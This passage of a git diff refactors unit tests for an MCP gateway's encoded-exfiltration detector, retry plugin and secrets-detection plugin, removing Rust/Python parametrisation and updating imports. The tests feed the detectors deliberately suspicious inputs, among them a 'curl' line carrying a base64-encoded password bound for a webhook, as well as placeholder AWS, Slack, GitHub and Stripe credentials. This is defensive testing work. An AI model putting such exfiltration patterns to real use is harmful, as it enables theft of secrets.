count_off, _, _ = _scan_container(payload, cfg_off, use_rust=False) + count_on, _, _ = _scan_container(payload, cfg_on) + count_off, _, _ = _scan_container(payload, cfg_off) # Both should find it in the raw string scan, but with JSON parsing on, # additional findings from the parsed structure may appear @@ -1260,7 +1151,7 @@ def test_json_within_string_no_double_counting(self): cfg = EncodedExfilDetectorConfig(min_suspicion_score=1, parse_json_strings=True) payload = {"input": json_str} - count, result, findings = _scan_container(payload, cfg, use_rust=False) + count, result, findings = _scan_container(payload, cfg) # Should find exactly 1 finding — not 2 from double-counting assert count == 1, f"Expected 1 finding but got {count}: single secret must not be double-counted" @@ -1272,7 +1163,7 @@ def test_malformed_json_string_no_crash(self): cfg = EncodedExfilDetectorConfig(parse_json_strings=True) payload = {"data": '{"broken json: missing closing brace'} - count, redacted, findings = _scan_container(payload, cfg, use_rust=False) + count, redacted, findings = _scan_container(payload, cfg) # Should not crash — just scan as regular text assert isinstance(count, int) @@ -1289,7 +1180,7 @@ def test_json_dedup_adds_unique_json_findings(self): cfg = EncodedExfilDetectorConfig(min_suspicion_score=1, parse_json_strings=True) payload = {"data": json_str} - count, result, findings = _scan_container(payload, cfg, use_rust=False) + count, result, findings = _scan_container(payload, cfg) assert count >= 1, "JSON-parsed finding should be detected" assert any("json" in f.get("path", "") for f in findings), "Finding should come from JSON path" assert isinstance(result["data"], str), "Return type must remain string" @@ -1306,8 +1197,8 @@ def test_cross_request_slow_exfil_not_tracked(self): # Each half is plain text (not encoded), so the scanner won't flag it. # But together they form: "password=super-secret-credential-value" # A cross-request correlator would reassemble and detect. - count1, _, _ = _scan_container({"data": "password=super-"}, cfg, use_rust=False) - count2, _, _ = _scan_container({"data": "secret-credential-value"}, cfg, use_rust=False) + count1, _, _ = _scan_container({"data": "password=super-"}, cfg) + count2, _, _ = _scan_container({"data": "secret-credential-value"}, cfg) assert count1 == 0, "Plain text half should not trigger" assert count2 == 0, "Plain text half should not trigger" @@ -1332,7 +1223,7 @@ def test_per_encoding_threshold(self): hex_payload = b"password=secret-value-for-upload".hex() payload = {"b64": f"curl {b64_payload} webhook", "hex": f"upload {hex_payload}"} - _, _, findings = _scan_container(payload, cfg, use_rust=False) + _, _, findings = _scan_container(payload, cfg) encodings_found = {f["encoding"] for f in findings} # base64 should be found (threshold=1, easy to pass) diff --git a/tests/unit/plugins/test_retry_with_backoff.py b/tests/unit/plugins/test_retry_with_backoff.py index cf774ad1bc..f75bd6b337 100644 --- a/tests/unit/plugins/test_retry_with_backoff.py +++ b/tests/unit/plugins/test_retry_with_backoff.py @@ -8,7 +8,7 @@ 4. RetryWithBackoffPlugin.__init__ — max_retries clamping, tool_overrides clamping 5. tool_post_invoke — first failure signals retry, exhaustion gives up, success resets state 6. State isolation — unique request_id per make_context() call ensures natural key isolation -7. Rust / Python path selection — Rust fast path taken when available, Python fallback when absent +7. Execution-path selection — native state manager handles structured failures, local state path handles text-content inspection 8. retry_policy metadata — all return paths include advisory policy dict; resource_post_fetch hook """ @@ -17,7 +17,7 @@ import pytest from unittest.mock import MagicMock, patch -from plugins.retry_with_backoff.retry_with_backoff import ( +from cpex_retry_with_backoff.retry_with_backoff import ( RetryWithBackoffPlugin, RetryConfig, _STATE, @@ -281,19 +281,19 @@ def test_other_tool_not_affected_by_override(self): class TestPluginInit: def test_max_retries_not_clamped_when_within_ceiling(self): - with patch("plugins.retry_with_backoff.retry_with_backoff.get_settings") as mock_settings: + with patch("cpex_retry_with_backoff.retry_with_backoff.get_settings") as mock_settings: mock_settings.return_value.max_tool_retries = 5 plugin = make_plugin({"max_retries": 3}) assert plugin._cfg.max_retries == 3 def test_max_retries_clamped_to_gateway_ceiling(self): - with patch("plugins.retry_with_backoff.retry_with_backoff.get_settings") as mock_settings: + with patch("cpex_retry_with_backoff.retry_with_backoff.get_settings") as mock_settings: mock_settings.return_value.max_tool_retries = 2 plugin = make_plugin({"max_retries": 5}) assert plugin._cfg.max_retries == 2 def test_tool_override_max_retries_clamped(self): - with patch("plugins.retry_with_backoff.retry_with_backoff.get_settings") as mock_settings: + with patch("cpex_retry_with_backoff.retry_with_backoff.get_settings") as mock_settings: mock_settings.return_value.max_tool_retries = 2 plugin = make_plugin( { @@ -304,7 +304,7 @@ def test_tool_override_max_retries_clamped(self): assert plugin._cfg.tool_overrides["slow_api"]["max_retries"] == 2 def test_clamping_emits_warning(self, caplog): - with patch("plugins.retry_with_backoff.retry_with_backoff.get_settings") as mock_settings: + with patch("cpex_retry_with_backoff.retry_with_backoff.get_settings") as mock_settings: mock_settings.return_value.max_tool_retries = 1 with caplog.at_level(logging.WARNING): make_plugin({"max_retries": 5}) @@ -312,7 +312,7 @@ def test_clamping_emits_warning(self, caplog): def test_max_retries_equal_ceiling_not_clamped(self): """max_retries exactly equal to the gateway ceiling must not be clamped.""" - with patch("plugins.retry_with_backoff.retry_with_backoff.get_settings") as mock_settings: + with patch("cpex_retry_with_backoff.retry_with_backoff.get_settings") as mock_settings: mock_settings.return_value.max_tool_retries = 3 plugin = make_plugin({"max_retries": 3}) assert plugin._cfg.max_retries == 3 @@ -467,7 +467,7 @@ def test_ttl_eviction_removes_stale_entries(self): key = "evict_tool:evict_req" # Inject a stale entry directly into _STATE - from plugins.retry_with_backoff.retry_with_backoff import _ToolRetryState + from cpex_retry_with_backoff.retry_with_backoff import _ToolRetryState _STATE[key] = _ToolRetryState(consecutive_failures=3, last_failure_at=time.monotonic() - _STATE_TTL_SECONDS - 1) assert key in _STATE @@ -482,7 +482,7 @@ def test_ttl_eviction_preserves_fresh_entries(self): import time key = "fresh_tool:fresh_req" - from plugins.retry_with_backoff.retry_with_backoff import _ToolRetryState + from cpex_retry_with_backoff.retry_with_backoff import _ToolRetryState _STATE[key] = _ToolRetryState(consecutive_failures=1, last_failure_at=time.monotonic()) _get_state("other_tool2", "other_req2") @@ -493,32 +493,29 @@ def test_ttl_eviction_preserves_fresh_entries(self): # --------------------------------------------------------------------------- -# 7. Rust / Python path selection +# 7. Execution-path selection # --------------------------------------------------------------------------- -class TestRustFallback: - """Verify that the plugin behaves identically whether the Rust extension is - present or absent, and that the correct code path is selected in each case. - """ +class TestExecutionPathSelection: + """Verify the plugin uses the correct state-management path for each signal type.""" @pytest.mark.asyncio - async def test_python_fallback_when_rust_unavailable(self): - """With _rust patched to None the Python path must still retry correctly.""" + async def test_local_state_path_handles_absent_native_manager(self): + """Without a native manager the local state path must still retry correctly.""" plugin = make_plugin() ctx = make_context() with patch.object(plugin, "_rust", None): r1 = await plugin.tool_post_invoke(make_payload("t", {"isError": True}), ctx) - assert r1.retry_delay_ms > 0, "Python fallback should request a retry on first failure" + assert r1.retry_delay_ms > 0, "local state path should request a retry on first failure" r2 = await plugin.tool_post_invoke(make_payload("t", {"result": "ok"}), ctx) - assert r2.retry_delay_ms == 0, "Python fallback should return 0 on success" + assert r2.retry_delay_ms == 0, "local state path should return 0 on success" @pytest.mark.asyncio - async def test_rust_path_taken_when_available(self): - """When _RUST is not None and check_text_content=False, check_and_update - must be called instead of the Python state functions.""" + async def test_native_state_manager_handles_structured_failures(self): + """Without text-content parsing the plugin should delegate retry tracking to the native state manager.""" plugin = make_plugin() ctx = make_context() @@ -534,9 +531,8 @@ async def test_rust_path_taken_when_available(self): assert r.retry_delay_ms == 300 @pytest.mark.asyncio - async def test_rust_path_bypassed_for_check_text_content(self): - """When check_text_content=True the plugin must use the Python path - even if _RUST is present, because signal 3 isn't implemented in Rust.""" + async def test_text_content_checks_bypass_native_state_manager(self): + """When check_text_content=True the plugin must use the local state path even when the native manager exists.""" plugin = make_plugin({"check_text_content": True}) ctx = make_context() diff --git a/tests/unit/plugins/test_secrets_detection.py b/tests/unit/plugins/test_secrets_detection.py index f721471097..3f8c0a86b3 100644 --- a/tests/unit/plugins/test_secrets_detection.py +++ b/tests/unit/plugins/test_secrets_detection.py @@ -1,9 +1,7 @@ # -*- coding: utf-8 -*- -"""Tests for secrets detection plugin regex patterns.""" +"""Tests for the packaged secrets detection plugin.""" # Standard -import logging -import os from pathlib import Path from unittest.mock import AsyncMock, MagicMock @@ -16,88 +14,40 @@ from mcpgateway.plugins.framework import PluginConfig, PluginManager, PluginMode, PromptHookType, PromptPrehookPayload, ResourceHookType, ResourcePostFetchPayload, ToolHookType, ToolPostInvokePayload from mcpgateway.plugins.framework.models import GlobalContext from mcpgateway.services.resource_service import ResourceService -from plugins.secrets_detection.secrets_detection import SecretsDetectionPlugin - -# Try to import Rust implementation -try: - # Third-Party - import secrets_detection_rust.secrets_detection_rust # noqa: F401 - imported to check availability - - RUST_AVAILABLE = True -except ImportError: - RUST_AVAILABLE = False - # Fail in CI if Rust plugins are required - if os.environ.get("REQUIRE_RUST") == "1": - raise ImportError("Rust plugin 'secrets_detection' is required in CI but not available") +from cpex_secrets_detection import py_scan_container +from cpex_secrets_detection.secrets_detection import SecretsDetectionPlugin @pytest.mark.asyncio -@pytest.mark.parametrize( - "use_rust", - [ - pytest.param(False, id="python"), - pytest.param(True, marks=pytest.mark.skipif(not RUST_AVAILABLE, reason="Rust not available"), id="rust"), - ], -) -async def test_resource_post_fetch_receives_resolved_content(use_rust): - """ - RESOURCE_POST_FETCH plugins should receive actual gateway content, - not template URIs. - - Tests with both Python and Rust implementations. - """ - +async def test_resource_post_fetch_receives_resolved_content(): + """RESOURCE_POST_FETCH plugins should receive resolved gateway content.""" captured = {} - # Subclass the real plugin to capture payload.content.text class CaptureSecretsPlugin(SecretsDetectionPlugin): async def resource_post_fetch(self, payload, context): captured["text"] = payload.content.text - # Force use of specific implementation - self._cfg.redact = False # Ensure we can test detection return await super().resource_post_fetch(payload, context) - plugin = CaptureSecretsPlugin( - PluginConfig( - name="secrets_detection", - kind="resource", - config={"use_rust": use_rust}, - ) - ) + plugin = CaptureSecretsPlugin(PluginConfig(name="secrets_detection", kind="resource", config={})) - # Fake DB resource (template-like content) fake_resource = MagicMock() fake_resource.id = "res1" fake_resource.uri = "file:///data/x.txt" fake_resource.enabled = True - fake_resource.content = ResourceContent( - type="resource", - id="res1", - uri="file:///data/x.txt", - text="file:///data/x.txt", # Simulate template URI in content - ) + fake_resource.content = ResourceContent(type="resource", id="res1", uri="file:///data/x.txt", text="file:///data/x.txt") fake_db = MagicMock() fake_db.get.return_value = fake_resource fake_db.execute.return_value.scalar_one_or_none.return_value = fake_resource service = ResourceService() - - # Mock gateway resolution service.invoke_resource = AsyncMock(return_value="actual file content") - # Minimal fake plugin manager pm = MagicMock() pm.has_hooks_for.return_value = True pm._initialized = True - async def invoke_hook( - hook_type, - payload, - global_ctx, - local_contexts=None, - violations_as_exceptions=True, - ): + async def invoke_hook(hook_type, payload, global_ctx, local_contexts=None, violations_as_exceptions=True): if hook_type == ResourceHookType.RESOURCE_POST_FETCH: await plugin.resource_post_fetch(payload, global_ctx) return MagicMock(modified_payload=None), None @@ -105,39 +55,14 @@ async def invoke_hook( pm.invoke_hook = invoke_hook service._get_plugin_manager = AsyncMock(return_value=pm) - # Execute - result = await service.read_resource( - db=fake_db, - resource_id="res1", - resource_uri="file:///data/x.txt", - ) + result = await service.read_resource(db=fake_db, resource_id="res1", resource_uri="file:///data/x.txt") - # Assertions - - # Plugin must have been called - assert "text" in captured - - # Plugin must NOT see template URI - assert captured["text"] != "file:///data/x.txt" - - # Plugin MUST see resolved gateway content assert captured["text"] == "actual file content" - - # Returned ResourceContent must also be resolved assert result.text == "actual file content" @pytest.mark.asyncio -@pytest.mark.parametrize( - "use_rust", - [ - pytest.param(False, id="python"), - pytest.param(True, marks=pytest.mark.skipif(not RUST_AVAILABLE, reason="Rust not available"), id="rust"), - ], -) class TestSecretsDetectionHookDispatch: - """Regression tests for the manager-dispatch paths called out in issue #5.""" - @pytest.fixture(autouse=True) def reset_plugin_manager(self): PluginManager.reset() @@ -148,22 +73,15 @@ def reset_plugin_manager(self): def _global_context() -> GlobalContext: return GlobalContext(request_id="req-secrets", server_id="srv-secrets") - async def _manager(self, monkeypatch: pytest.MonkeyPatch, tmp_path: Path, use_rust: bool, config: dict) -> PluginManager: - # First-Party - from plugins.secrets_detection import secrets_detection as module - - if not use_rust: - monkeypatch.setattr(module, "_RUST_AVAILABLE", False) - monkeypatch.setattr(module, "secrets_detection", None) - - config_path = tmp_path / f"secrets_detection_{'rust' if use_rust else 'python'}.yaml" + async def _manager(self, tmp_path: Path, config: dict) -> PluginManager: + config_path = tmp_path / "secrets_detection.yaml" config_path.write_text( yaml.safe_dump( { "plugins": [ { "name": "SecretsDetection", - "kind": "plugins.secrets_detection.secrets_detection.SecretsDetectionPlugin", + "kind": "cpex_secrets_detection.secrets_detection.SecretsDetectionPlugin", "hooks": [ PromptHookType.PROMPT_PRE_FETCH.value, ToolHookType.TOOL_POST_INVOKE.value, @@ -186,583 +104,53 @@ async def _manager(self, monkeypatch: pytest.MonkeyPatch, tmp_path: Path, use_ru ), encoding="utf-8", ) - manager = PluginManager(str(config_path)) await manager.initialize() return manager - async def test_prompt_pre_fetch_redacts_without_blocking(self, monkeypatch: pytest.MonkeyPatch, tmp_path: Path, use_rust: bool): - manager = await self._manager(monkeypatch, tmp_path, use_rust, {"block_on_detection": False, "redact": True, "redaction_text": "[REDACTED]"}) + async def test_prompt_pre_fetch_blocks_without_redaction(self, tmp_path: Path): + manager = await self._manager(tmp_path, {"block_on_detection": True, "redact": False}) try: payload = PromptPrehookPayload(prompt_id="prompt-1", args={"input": "AWS_ACCESS_KEY_ID=AKIAFAKE12345EXAMPLE"}) result, _ = await manager.invoke_hook(PromptHookType.PROMPT_PRE_FETCH, payload, global_context=self._global_context()) - - assert result.continue_processing is True - assert result.violation is None - assert result.modified_payload is not None - assert result.modified_payload.args["input"] == "AWS_ACCESS_KEY_ID=[REDACTED]" - assert result.metadata["secrets_redacted"] is True - assert result.metadata["count"] == 1 - finally: - await manager.shutdown() - - async def test_prompt_pre_fetch_blocks_without_redaction(self, monkeypatch: pytest.MonkeyPatch, tmp_path: Path, use_rust: bool): - manager = await self._manager(monkeypatch, tmp_path, use_rust, {"block_on_detection": True, "redact": False}) - try: - payload = PromptPrehookPayload(prompt_id="prompt-1", args={"input": "AWS_ACCESS_KEY_ID=AKIAFAKE12345EXAMPLE"}) - result, _ = await manager.invoke_hook(PromptHookType.PROMPT_PRE_FETCH, payload, global_context=self._global_context()) - assert result.continue_processing is False - assert result.violation is not None assert result.violation.code == "SECRETS_DETECTED" - # Blocking plugins do not return a modified payload here; the manager - # backfills the current payload into the aggregate result on block. assert result.modified_payload == payload finally: await manager.shutdown() - async def test_tool_post_invoke_redacts_mcp_content_payload(self, monkeypatch: pytest.MonkeyPatch, tmp_path: Path, use_rust: bool): - manager = await self._manager(monkeypatch, tmp_path, use_rust, {"block_on_detection": False, "redact": True, "redaction_text": "[REDACTED]"}) - try: - payload = ToolPostInvokePayload( - name="writer", - result={"content": [{"type": "text", "text": "AWS_ACCESS_KEY_ID=AKIAFAKE12345EXAMPLE"}], "isError": False}, - ) - result, _ = await manager.invoke_hook(ToolHookType.TOOL_POST_INVOKE, payload, global_context=self._global_context()) - - assert result.continue_processing is True - assert result.violation is None - assert result.modified_payload is not None - assert result.modified_payload.result["content"][0]["text"] == "AWS_ACCESS_KEY_ID=[REDACTED]" - assert result.modified_payload.result["isError"] is False - assert result.metadata["secrets_redacted"] is True - assert result.metadata["count"] == 1 - finally: - await manager.shutdown() - - async def test_tool_post_invoke_blocks_without_redaction(self, monkeypatch: pytest.MonkeyPatch, tmp_path: Path, use_rust: bool): - manager = await self._manager(monkeypatch, tmp_path, use_rust, {"block_on_detection": True, "redact": False}) - try: - payload = ToolPostInvokePayload( - name="writer", - result={"content": [{"type": "text", "text": "AWS_ACCESS_KEY_ID=AKIAFAKE12345EXAMPLE"}], "isError": False}, - ) - result, _ = await manager.invoke_hook(ToolHookType.TOOL_POST_INVOKE, payload, global_context=self._global_context()) - assert result.continue_processing is False - assert result.violation is not None - assert result.violation.code == "SECRETS_DETECTED" - # Blocking plugins do not return a modified payload here; the manager - # backfills the current payload into the aggregate result on block. - assert result.modified_payload == payload - finally: - await manager.shutdown() - - async def test_resource_post_fetch_redacts_without_blocking(self, monkeypatch: pytest.MonkeyPatch, tmp_path: Path, use_rust: bool): - manager = await self._manager(monkeypatch, tmp_path, use_rust, {"block_on_detection": False, "redact": True, "redaction_text": "[REDACTED]"}) - try: - payload = ResourcePostFetchPayload( - uri="file:///secret.txt", - content=ResourceContent(type="resource", id="res-1", uri="file:///secret.txt", text="AWS_ACCESS_KEY_ID=AKIAFAKE12345EXAMPLE"), - ) - result, _ = await manager.invoke_hook(ResourceHookType.RESOURCE_POST_FETCH, payload, global_context=self._global_context()) - - assert result.continue_processing is True - assert result.violation is None - assert result.modified_payload is not None - assert result.modified_payload.content.text == "AWS_ACCESS_KEY_ID=[REDACTED]" - assert result.metadata["secrets_redacted"] is True - assert result.metadata["count"] == 1 - finally: - await manager.shutdown() - - async def test_resource_post_fetch_blocks_without_redaction(self, monkeypatch: pytest.MonkeyPatch, tmp_path: Path, use_rust: bool): - manager = await self._manager(monkeypatch, tmp_path, use_rust, {"block_on_detection": True, "redact": False}) - try: - payload = ResourcePostFetchPayload( - uri="file:///secret.txt", - content=ResourceContent(type="resource", id="res-1", uri="file:///secret.txt", text="AWS_ACCESS_KEY_ID=AKIAFAKE12345EXAMPLE"), - ) - result, _ = await manager.invoke_hook(ResourceHookType.RESOURCE_POST_FETCH, payload, global_context=self._global_context()) - - assert result.continue_processing is False - assert result.violation is not None - assert result.violation.code == "SECRETS_DETECTED" - # Blocking plugins do not return a modified payload here; the manager - # backfills the current payload into the aggregate result on block. - assert result.modified_payload == payload - finally: - await manager.shutdown() - - -@pytest.mark.parametrize( - "use_rust", - [ - pytest.param(False, id="python"), - pytest.param(True, marks=pytest.mark.skipif(not RUST_AVAILABLE, reason="Rust not available"), id="rust"), - ], -) -class TestAwsSecretPattern: - """Test AWS secret access key pattern for correctness with both implementations.""" - - def test_matches_standard_format(self, use_rust): - """Pattern should match standard AWS secret key format.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - config = SecretsDetectionConfig() - text = "AWS_SECRET_ACCESS_KEY=FAKESecretAccessKeyForTestingEXAMPLE0000" - - count, _redacted, findings = _scan_container(text, config, use_rust=use_rust) - assert count >= 1 - assert any(f.get("type") == "aws_secret_access_key" for f in findings) - - def test_matches_with_separators(self, use_rust): - """Pattern should match with various separators.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - config = SecretsDetectionConfig() - - for text in [ - "aws_secret_key=FAKESecretAccessKeyForTestingEXAMPLE0000", - "aws-access-key=FAKESecretAccessKeyForTestingEXAMPLE0000", - "AWS_SECRET=FAKESecretAccessKeyForTestingEXAMPLE0000", - ]: - count, _redacted, findings = _scan_container(text, config, use_rust=use_rust) - assert count >= 1, f"Failed to detect secret in: {text}" - - def test_case_insensitive(self, use_rust): - """Pattern should be case-insensitive for the prefix.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - config = SecretsDetectionConfig() - - for text in [ - "aws_secret=FAKESecretAccessKeyForTestingEXAMPLE0000", - "AWS_SECRET=FAKESecretAccessKeyForTestingEXAMPLE0000", - "Aws_Secret=FAKESecretAccessKeyForTestingEXAMPLE0000", - ]: - count, _redacted, findings = _scan_container(text, config, use_rust=use_rust) - assert count >= 1, f"Failed to detect secret in: {text}" - - def test_no_match_short_secret(self, use_rust): - """Pattern should not match secrets shorter than 40 chars.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - config = SecretsDetectionConfig() - text = "aws_secret=FAKESecretKeyThatIsTooShortToMatch" # Too short - - count, _redacted, findings = _scan_container(text, config, use_rust=use_rust) - # Should not match aws_secret_access_key pattern (too short) - assert not any(f.get("type") == "aws_secret_access_key" for f in findings) - - def test_no_match_missing_equals(self, use_rust): - """Pattern should not match without = sign.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - config = SecretsDetectionConfig() - text = "aws_secret FAKESecretAccessKeyForTestingEXAMPLE0000" - - count, _redacted, findings = _scan_container(text, config, use_rust=use_rust) - # Should not match aws_secret_access_key pattern (no equals sign) - assert not any(f.get("type") == "aws_secret_access_key" for f in findings) - - def test_no_match_unrelated_text(self, use_rust): - """Pattern should not match unrelated text.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - config = SecretsDetectionConfig() - - for text in [ - "This is just some random text", - "aws is a cloud provider", - ]: - count, _redacted, findings = _scan_container(text, config, use_rust=use_rust) - assert count == 0, f"False positive in: {text}" - - def test_captures_secret_value(self, use_rust): - """Pattern should capture the secret value.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - config = SecretsDetectionConfig() - text = "AWS_SECRET_ACCESS_KEY=FAKESecretAccessKeyForTestingEXAMPLE0000" - - count, _redacted, findings = _scan_container(text, config, use_rust=use_rust) +class TestSecretsDetectionRustAPI: + def test_detects_aws_secret_access_key(self): + count, _redacted, findings = py_scan_container("AWS_SECRET_ACCESS_KEY=FAKESecretAccessKeyForTestingEXAMPLE0000", {}) assert count >= 1 - # Check that the finding contains a preview of the secret - aws_findings = [f for f in findings if f.get("type") == "aws_secret_access_key"] - assert len(aws_findings) >= 1 - assert aws_findings[0].get("match") is not None - - -# Parametrized tests that run with both Python and Rust implementations -@pytest.mark.parametrize( - "use_rust", - [ - pytest.param(False, id="python"), - pytest.param(True, marks=pytest.mark.skipif(not RUST_AVAILABLE, reason="Rust not available"), id="rust"), - ], -) -class TestSecretsDetectionBothImplementations: - """Test secrets detection with both Python and Rust implementations. - - These tests run twice - once with use_rust=False (Python) and once with use_rust=True (Rust). - This ensures both implementations produce correct results. - """ - - def test_detects_aws_access_key(self, use_rust): - """Should detect AWS access keys.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - config = SecretsDetectionConfig() - data = {"message": "AWS_ACCESS_KEY_ID=AKIAFAKE12345EXAMPLE"} - - count, _redacted, findings = _scan_container(data, config, use_rust=use_rust) - - assert count >= 1 - assert len(findings) >= 1 - assert any(f.get("type") == "aws_access_key_id" for f in findings) - - def test_detects_aws_secret_key(self, use_rust): - """Should detect AWS secret keys.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - config = SecretsDetectionConfig() - data = {"message": "AWS_SECRET_ACCESS_KEY=FAKESecretAccessKeyForTestingEXAMPLE0000"} - - count, _redacted, findings = _scan_container(data, config, use_rust=use_rust) - - assert count >= 1 - assert len(findings) >= 1 assert any(f.get("type") == "aws_secret_access_key" for f in findings) - def test_detects_slack_token(self, use_rust): - """Should detect Slack tokens.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - config = SecretsDetectionConfig() - data = {"message": "xoxr-fake-000000000-fake000000000-fakefakefakefake"} - - count, _redacted, findings = _scan_container(data, config, use_rust=use_rust) - + def test_detects_slack_token(self): + count, _redacted, findings = py_scan_container("xoxr-fake-000000000-fake000000000-fakefakefakefake", {}) assert count >= 1 - assert len(findings) >= 1 assert any(f.get("type") == "slack_token" for f in findings) - def test_detects_google_api_key(self, use_rust): - """Should detect Google API keys.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - config = SecretsDetectionConfig() - data = {"message": "AIzaFAKE_KEY_FOR_TESTING_ONLY_fake12345"} - - count, _redacted, findings = _scan_container(data, config, use_rust=use_rust) - - assert count >= 1 - assert len(findings) >= 1 - assert any(f.get("type") == "google_api_key" for f in findings) - - def test_detects_github_token_without_label(self, use_rust): - """Should detect provider-specific GitHub tokens without relying on labels.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - config = SecretsDetectionConfig() - data = {"message": "Token value ghp_1234567890abcdefghijklmnopqrstuvwxyZ was pasted into the chat"} # pragma: allowlist secret - - count, _redacted, findings = _scan_container(data, config, use_rust=use_rust) - - assert count >= 1 - assert any(f.get("type") == "github_token" for f in findings) - - def test_detects_github_fine_grained_pat_without_label(self, use_rust): - """Should detect GitHub fine-grained PATs from their intrinsic prefix.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - config = SecretsDetectionConfig() - token = "github_pat_abcdefghijklmnopqrstuvwxyz_ABCDEFGHIJKLMNOPQRSTUVWXYZ12" # pragma: allowlist secret - data = {"message": f"{token} was pasted into the chat"} - - count, _redacted, findings = _scan_container(data, config, use_rust=use_rust) - - assert count >= 1 - assert any(f.get("type") == "github_token" for f in findings) - - def test_detects_stripe_secret_key_without_label(self, use_rust): - """Should detect Stripe secret keys from their intrinsic prefix.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - config = SecretsDetectionConfig() - stripe_secret = "_".join(["sk", "live", "1234567890abcdefghijklmnop"]) # pragma: allowlist secret - data = {"message": f"{stripe_secret} should never be committed"} - - count, _redacted, findings = _scan_container(data, config, use_rust=use_rust) - - assert count >= 1 - assert any(f.get("type") == "stripe_secret_key" for f in findings) - - def test_does_not_treat_publishable_stripe_key_as_secret(self, use_rust): - """Should avoid obvious Stripe false positives like publishable keys.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - config = SecretsDetectionConfig() - publishable_key = "_".join(["pk", "live", "1234567890abcdefghijklmnop"]) # pragma: allowlist secret - data = {"message": f"{publishable_key} is a publishable key example"} - - count, _redacted, findings = _scan_container(data, config, use_rust=use_rust) - - assert not any(f.get("type") == "stripe_secret_key" for f in findings) - - def test_redaction_works(self, use_rust): - """Should redact secrets when enabled.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - config = SecretsDetectionConfig(redact=True, redaction_text="[REDACTED]") - data = "AWS_ACCESS_KEY_ID=AKIAFAKE12345EXAMPLE" - - count, redacted, findings = _scan_container(data, config, use_rust=use_rust) - + def test_redaction_works(self): + count, redacted, findings = py_scan_container("AWS_ACCESS_KEY_ID=AKIAFAKE12345EXAMPLE", {"redact": True, "redaction_text": "[REDACTED]"}) assert count >= 1 assert "[REDACTED]" in redacted - assert "AKIAFAKE12345EXAMPLE" not in redacted - - def test_handles_nested_structures(self, use_rust): - """Should handle nested dicts and lists.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig + assert findings - config = SecretsDetectionConfig() + def test_handles_nested_structures(self): data = {"users": [{"name": "Alice", "key": "AKIAFAKE12345EXAMPLE"}, {"name": "Bob", "token": "xoxr-fake-000000000-fake000000000-fakefakefakefake"}]} - - count, _redacted, findings = _scan_container(data, config, use_rust=use_rust) - + count, _redacted, findings = py_scan_container(data, {}) assert count >= 2 assert len(findings) >= 2 - def test_no_secrets_returns_zero(self, use_rust): - """Should return zero findings for clean text.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - config = SecretsDetectionConfig() - data = {"message": "This is just normal text without any secrets"} - - count, redacted, findings = _scan_container(data, config, use_rust=use_rust) - - assert count == 0 - assert len(findings) == 0 - assert redacted == data - - def test_empty_string(self, use_rust): - """Should handle empty strings.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - config = SecretsDetectionConfig() - data = {"message": ""} - - count, redacted, findings = _scan_container(data, config, use_rust=use_rust) - - assert count == 0 - assert len(findings) == 0 - assert redacted == data - - def test_multiple_secrets(self, use_rust): - """Should detect multiple secrets in one message.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - config = SecretsDetectionConfig() - data = {"message": "AWS_KEY=AKIAFAKE12345EXAMPLE and Slack token xoxr-fake-000000000-fake000000000-fakefakefakefake"} - - count, _redacted, findings = _scan_container(data, config, use_rust=use_rust) - - assert count >= 2 - assert len(findings) >= 2 - - -def test_implementation_info(): - """Report which implementations are available for testing.""" - print("\n" + "=" * 60) - print("Secrets Detection Test Configuration") - print("=" * 60) - print("Python implementation: ✓ Available") - print(f"Rust implementation: {'✓ Available' if RUST_AVAILABLE else '✗ Not available'}") - - if RUST_AVAILABLE: - print("\n✓ Tests will run with BOTH Python and Rust implementations") - else: - print("\n⚠ Tests will run with Python implementation only") - print(" To enable Rust tests, build the Rust plugin:") - print(" cd plugins_rust/secrets_detection && maturin develop --release") - - print("=" * 60) - - -def test_default_config_disables_broad_generic_api_key_pattern(): - """Broad generic API-key assignment detection should stay opt-in.""" - # First-Party - from plugins.secrets_detection.secrets_detection import SecretsDetectionConfig - - config = SecretsDetectionConfig() - - assert config.enabled["generic_api_key_assignment"] is False - - -def test_partial_enabled_config_preserves_safe_defaults(): - """Partial enabled maps should not silently enable broad heuristics.""" - # First-Party - from plugins.secrets_detection.secrets_detection import SecretsDetectionConfig - - config = SecretsDetectionConfig(enabled={"aws_access_key_id": False}) - - assert config.enabled["aws_access_key_id"] is False - assert config.enabled["github_token"] is True - assert config.enabled["stripe_secret_key"] is True - assert config.enabled["generic_api_key_assignment"] is False - - -@pytest.mark.skipif(not RUST_AVAILABLE, reason="Rust not available") -def test_rust_scan_emits_python_log_records(caplog): - """Rust logging should bridge into Python logging via pyo3_log.""" - # First-Party - from plugins.secrets_detection.secrets_detection import _scan_container, SecretsDetectionConfig - - caplog.set_level(logging.DEBUG) - # Fake AWS key for testing - not a real credential - secret = "AWS_ACCESS_KEY_ID=AKIAFAKE12345EXAMPLE" - - count, _redacted, findings = _scan_container(secret, SecretsDetectionConfig(), use_rust=True) - - assert count >= 1 - assert findings - assert any("Rust 